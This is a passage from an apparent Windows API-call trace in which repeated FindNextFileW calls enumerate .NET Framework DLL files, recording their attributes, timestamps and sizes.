ftLastAccessTime.dwLowDateTime=0x8dc3859c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dc40e0a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb5688, dwReserved0=0x0, dwReserved1=0x0, cFileName="SOS.dll", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf42486, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf42486, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xf42486, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SQL", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93daf9f8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93daf9f8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93db2105, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x20490, dwReserved0=0x0, dwReserved1=0x0, cFileName="sysglobl.dll", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd22285, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd22285, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd28430, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xacb10, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Activities.Core.Presentation.dll", cAlternateFileName="")) returned 1 [0101.737] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9214c0a6, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9214c0a6, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9216cfa8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1752c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Activities.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c33a8f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91c33a8f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91c374fd, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x22b30, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Activities.DurableInstancing.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91dcb6a7, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91dcb6a7, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91df4e16, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x201100, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Activities.Presentation.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93989a25, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93989a25, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9398ae28, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xccd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.AddIn.Contract.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3eb381, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e3eb381, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e3ec774, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x27cb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.AddIn.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e151ed2, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e151ed2, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e153295, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7310, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Collections.Concurrent.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x923b95a1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x923b95a1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x923ba99e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Collections.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e7907e, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93e7907e, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93e7907e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7728, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.Annotations.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e25861f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e25861f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e25ad13, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x4a928, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.Composition.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91edeb5b, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91edeb5b, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91edfe82, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xf780, dwReserved0=0x0, dwReserved1=0x0, cFileName="system.componentmodel.composition.registration.dll", cAlternateFileName="")) returned 1 [0101.738] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e3fd8a9, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e3fd8a9, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e3fec4a, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1ed38, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.DataAnnotations.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922304c2, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922304c2, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x922304c2, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72d8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2cb22f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e2cb22f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e2cc5e4, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7340, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.ComponentModel.EventBasedAsync.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x919ffb29, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x919ffb29, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91a0361d, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x62cd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Configuration.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e30bda8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e30bda8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e30e4e2, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x19108, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Configuration.Install.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd67bca, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd67bca, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd7a0bd, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1494a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Core.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dfba389, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dfba389, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dfbb715, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x11908, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.DataSetExtensions.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93e29ae8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93e29ae8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93e6cd23, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x33b8b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91ef98a9, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91ef98a9, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91f74d90, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1084e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Entity.Design.dll", cAlternateFileName="")) returned 1 [0101.740] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1ab0a1, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e1ab0a1, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e1e0c78, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x3d8cd0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Entity.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9218dee5, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x9218dee5, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x921940f0, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa84c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Linq.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e300dd8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e300dd8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e30966e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7c2e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.OracleClient.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de890c0, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8de890c0, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8de8cb4b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x6c8f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.Client.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de905fb, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8de905fb, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8de919bb, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2aaf0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.Design.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dba0fc5, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dba0fc5, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dba84e1, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xa44d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.Services.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e1fcd9b, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e1fcd9b, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e2056e8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xb34c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Data.SqlXml.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93cd7927, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93cd7927, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ce28f5, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xcf6c0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Deployment.dll", cAlternateFileName="")) returned 1 [0101.741] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91e10f41, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91e10f41, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91ebb461, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x4c8cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Design.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x939fda1b, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x939fda1b, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93a01440, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0xfab8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Device.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x922b7cb8, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x922b7cb8, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x922b7cb8, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x7508, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Diagnostics.Contracts.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd7a0bd, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd7a0bd, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd7b4bb, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Diagnostics.Debug.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8df3c7eb, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8df3c7eb, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8df3c7eb, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x72e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Diagnostics.Tools.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91c02d66, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91c02d66, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x91c02d66, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74f8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Diagnostics.Tracing.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92196849, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92196849, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9219a265, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x48530, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.DirectoryServices.AccountManagement.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dd8ecec, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8dd8ecec, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8dd9274b, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x672e8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.DirectoryServices.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92073f69, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92073f69, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x92076687, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x31328, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.DirectoryServices.Protocols.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92237a34, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92237a34, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x9228f7d9, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x357e78, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.dll", cAlternateFileName="")) returned 1 [0101.742] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93a7061f, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93a7061f, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93a7193e, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1bae0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Drawing.Design.dll", cAlternateFileName="")) returned 1 [0101.743] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x92170c3c, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x92170c3c, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x921792e1, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x91cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Drawing.dll", cAlternateFileName="")) returned 1 [0101.743] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93ed22ec, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x93ed22ec, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x93ed22ec, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Drawing.tlb", cAlternateFileName="")) returned 1 [0101.743] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e2670c2, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8e2670c2, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8e268467, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x1feb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Dynamic.dll", cAlternateFileName="")) returned 1 [0101.743] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8de07a74, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x8de07a74, ftLastAccessTime.dwHighDateTime=0x1d8a73a, ftLastWriteTime.dwLowDateTime=0x8de08de7, ftLastWriteTime.dwHighDateTime=0x1d8a73a, nFileSizeHigh=0x0, nFileSizeLow=0x74e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System.Dynamic.Runtime.dll", cAlternateFileName="")) returned 1 [0101.743] FindNextFileW (in: hFindFile=0x678d18, lpFindFileData=0x19e7d0 | out: lpFindFileData=0x19e7d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x91bd0c7a, ftCreationTime.dwHighDateTime=0x1d8a73a, ftLastAccessTime.dwLowDateTime=0x91bd0c7a, 